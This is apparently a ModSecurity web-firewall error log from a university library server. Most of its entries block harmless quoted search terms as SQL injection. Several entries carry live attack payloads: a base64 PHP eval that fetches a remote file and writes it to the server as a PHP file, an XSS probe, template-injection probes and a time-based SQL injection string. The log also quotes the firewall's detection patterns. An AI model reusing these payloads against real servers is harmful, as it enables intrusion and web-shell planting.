[Mon Aug 28 13:05:10.804400 2023] [:error] [pid 43246] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Henry Gunawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw5FsCo-f0AAKju6wYAAAAE"]
[Mon Aug 28 14:12:31.954822 2023] [:error] [pid 44805] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22HUKUM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxI38Co-f0AAK8FLc8AAAAB"]
[Mon Aug 28 14:17:08.705393 2023] [:error] [pid 44865] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BASARIA PANJAITAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxJ9MCo-f0AAK9BGJIAAAAH"]
[Mon Aug 28 14:23:05.515221 2023] [:error] [pid 44858] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Eduardus Marius\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxLWcCo-f0AAK86m2EAAAAM"]
[Mon Aug 28 14:33:35.698449 2023] [:error] [pid 45028] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MOH.NAZIR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxNz8Co-f0AAK-kAOsAAAAS"]
[Mon Aug 28 14:45:24.444624 2023] [:error] [pid 45363] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22POLITIK HUKUM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxQlMCo-f0AALEz0E0AAAAI"]
[Mon Aug 28 14:50:15.770828 2023] [:error] [pid 45368] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PADMO WAHJONO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxRt8Co-f0AALE4UioAAAAM"]
[Mon Aug 28 14:51:12.495302 2023] [:error] [pid 45434] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22yurisprudensi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxR8MCo-f0AALF6YToAAAAO"]
[Mon Aug 28 15:04:35.069451 2023] [:error] [pid 45530] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22hukum perselisihan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxVE8Co-f0AALHat28AAAAK"]
[Mon Aug 28 15:07:08.180241 2023] [:error] [pid 45683] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fia Delpia\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxVrMCo-f0AALJzrwoAAAAM"]
[Mon Aug 28 16:20:56.679247 2023] [:error] [pid 47209] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jimmy Septiadi Kencana\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxm@MCo-f0AALhpMgcAAAAX"]
[Mon Aug 28 16:45:35.533029 2023] [:error] [pid 47586] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ASPEK HUKUM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxsv8Co-f0AALni5kEAAAAG"]
[Mon Aug 28 16:49:23.724722 2023] [:error] [pid 47858] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ZAENI ASYHADIE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxto8Co-f0AALrypiUAAAAS"]
[Mon Aug 28 19:59:28.667535 2023] [:error] [pid 51242] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AGUS GURLAYA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyaMMCo-f0AAMgqi@MAAAAB"]
[Mon Aug 28 20:07:16.498769 2023] [:error] [pid 51380] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Eliestya Monica\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOycBMCo-f0AAMi0@lIAAAAI"]
[Mon Aug 28 20:12:34.370431 2023] [:error] [pid 51511] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilibfh.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydQsCo-f0AAMk3yQ4AAAAP"]
[Mon Aug 28 20:34:53.587150 2023] [:error] [pid 51935] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ellydar chaidir\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyifcCo-f0AAMrfNYgAAAAe"]
[Mon Aug 28 23:18:09.635112 2023] [:error] [pid 54092] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22sosiologi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzIwcCo-f0AANNMExUAAAAK"]
[Mon Aug 28 23:34:07.554897 2023] [:error] [pid 55231] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22hukum organisasi perusahaan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzMf8Co-f0AANe-ouoAAAAV"]
[Tue Aug 29 00:08:32.356006 2023] [:error] [pid 56095] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22tindak pidana\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzUkMCo-f0AANsfIlIAAAAK"]
[Tue Aug 29 03:27:30.022189 2023] [:error] [pid 58532] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nuruddin Hady\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0DMsCo-f0AAOSkmF4AAAAL"]
[Tue Aug 29 07:19:49.406890 2023] [:error] [pid 61479] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22YADIMAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO05pcCo-f0AAPAnfukAAAAR"]
[Tue Aug 29 11:20:03.438366 2023] [:error] [pid 612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO1x88Co-f0AAAJky0YAAAAL"]
[Tue Aug 29 11:20:08.057616 2023] [:error] [pid 612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO1x@MCo-f0AAAJky0cAAAAL"]
[Tue Aug 29 11:30:10.900924 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10UsCo-f0AAAOYZhIAAAAB"]
[Tue Aug 29 11:30:10.961560 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10UsCo-f0AAAO-1nIAAAAI"]
[Tue Aug 29 11:30:11.778279 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAPDnuUAAAAP"]
